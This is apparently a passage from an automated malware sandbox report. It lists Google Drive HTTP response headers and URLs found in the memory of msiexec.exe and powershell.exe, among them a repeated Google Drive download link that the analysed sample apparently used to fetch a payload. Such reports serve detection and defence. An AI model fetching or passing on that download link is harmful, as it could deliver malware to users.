Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRiznYI3J0EdjZatKLEDqleogOrRsw2whgfx1Sbeeg47UMHataN5de9ix8sImtnHftMSxlpF38Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:56 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-m6lHwX_tYE6fi_6jU4ZnQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC78cnMeQxiMtzLvvwcOEyCmkpcHSuTOQ0Yzi0ICQeb3je7LyHoGDNGkanFujjf8jpl8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:59 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-HND_VF4-F29QqCe7GGAXcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: msiexec.exe, 00000008.00000002.3378923875.00000000075FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tta
      Source: msiexec.exe, 00000008.00000003.2676392370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2619520650.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2630558630.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2653986406.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2665575556.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722361589.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2676459479.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2642907755.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687998730.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2642875929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2607772288.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2619484326.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2699591387.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2699646259.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711317348.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2665544248.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4ttssionKeyBackward
      Source: msiexec.exe, 00000008.00000003.2734019365.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711361558.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.000000000764D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814424080.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780411349.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767526641.000000000764D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2873005207.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.000000000764D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848954524.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757289437.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803545338.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836951990.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.000000000764C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tttUn
      Source: msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3191014204.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179936341.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2653986406.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2665575556.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2642907755.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2895819803.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2642875929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2906716111.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2906685901.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2895772098.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3190978777.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2918962381.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179984412.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2930939009.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2665544248.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2930909039.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/x
      Source: msiexec.exe, 00000008.00000003.3070442102.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000645370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168312136.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989713394.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3093480353.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3059027146.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965651967.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3035039238.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3046207658.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965683282.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3116840171.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3082616591.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168346621.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128192594.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3082576480.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3116878506.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3140381354.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3093433677.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128227400.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000008.00000003.3023170701.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3012198681.0000000007671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/~o
      Source: msiexec.exe, 00000008.00000003.2803545338.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: msiexec.exe, 00000008.00000003.2676392370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3070442102.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767470543.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000645370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168312136.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989713394.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3093480353.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3059027146.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573550083.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3191014204.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965651967.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2619520650.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2630558630.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3035039238.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000008.00000003.3046207658.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965683282.0000000007677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/&
      Source: msiexec.exe, 00000008.00000003.2767526641.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780411349.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2873005207.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848954524.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814424080.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836951990.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803545338.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/(E
      Source: msiexec.exe, 00000008.00000003.2676392370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3070442102.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767470543.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000645370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168312136.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989713394.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3093480353.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3059027146.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573550083.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3191014204.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965651967.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2619520650.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2630558630.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3035039238.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000008.00000003.3046207658.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965683282.0000000007677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/3
      Source: msiexec.exe, 00000008.00000003.2767526641.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780411349.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2734019365.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757289437.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711361558.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814424080.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803545338.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/8F
      Source: msiexec.exe, 00000008.00000003.2767526641.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780411349.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2734019365.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757289437.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2873005207.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848954524.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711361558.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814424080.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836951990.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803545338.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/PE5$
      Source: msiexec.exe, 00000008.00000003.2607825017.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2607772288.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravz
      Source: msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
      Source: msiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860464156.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848899256.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836916094.0000000007671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download;
      Source: msiexec.exe, 00000008.00000003.2848899256.0000000007673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=downloadAj
      Source: msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860464156.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848899256.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836916094.0000000007671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=downloadS1
      Source: msiexec.exe, 00000008.00000003.2860464156.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=downloadU
      Source: msiexec.exe, 00000008.00000003.2676392370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767470543.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2653986406.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2665575556.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2744986584.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722361589.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2676459479.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687998730.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780341301.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2733970242.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757239384.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2699591387.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2699646259.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711317348.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2665544248.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=downloadUn
      Source: msiexec.exe, 00000008.00000003.2860464156.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848899256.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836916094.0000000007671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=downloadis
      Source: msiexec.exe, 00000008.00000002.3378923875.00000000075FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=downloadt9
      Source: msiexec.exe, 00000008.00000002.3378923875.00000000075FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=downloadu4
      Source: msiexec.exe, 00000008.00000003.2653986406.0000000007679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/o
      Source: msiexec.exe, 00000008.00000002.3378923875.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/oft
      Source: msiexec.exe, 00000008.00000003.3168312136.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168346621.0000000007676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/u
      Source: powershell.exe, 00000002.00000002.2511889664.0000000004A96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.2514289224.00000000059A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: msiexec.exe, 00000008.00000003.2767526641.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573550083.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3318326115.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3237785223.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3295276947.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128192594.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179890641.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722361589.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2676459479.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378923875.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573778561.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3318360888.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000008.00000003.2965523357.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: msiexec.exe, 00000008.00000003.2757239384.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/eleme
      Source: msiexec.exe, 00000008.00000003.2930909039.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3157176290.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3012230458.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2733926611.00000000076B2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: msiexec.exe, 00000008.00000003.2989713394.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989745617.0000000007677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;re
      Source: msiexec.exe, 00000008.00000003.2744986584.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;rep
      Source: msiexec.exe, 00000008.00000003.2930909039.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3157176290.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3012230458.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2733926611.00000000076B2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
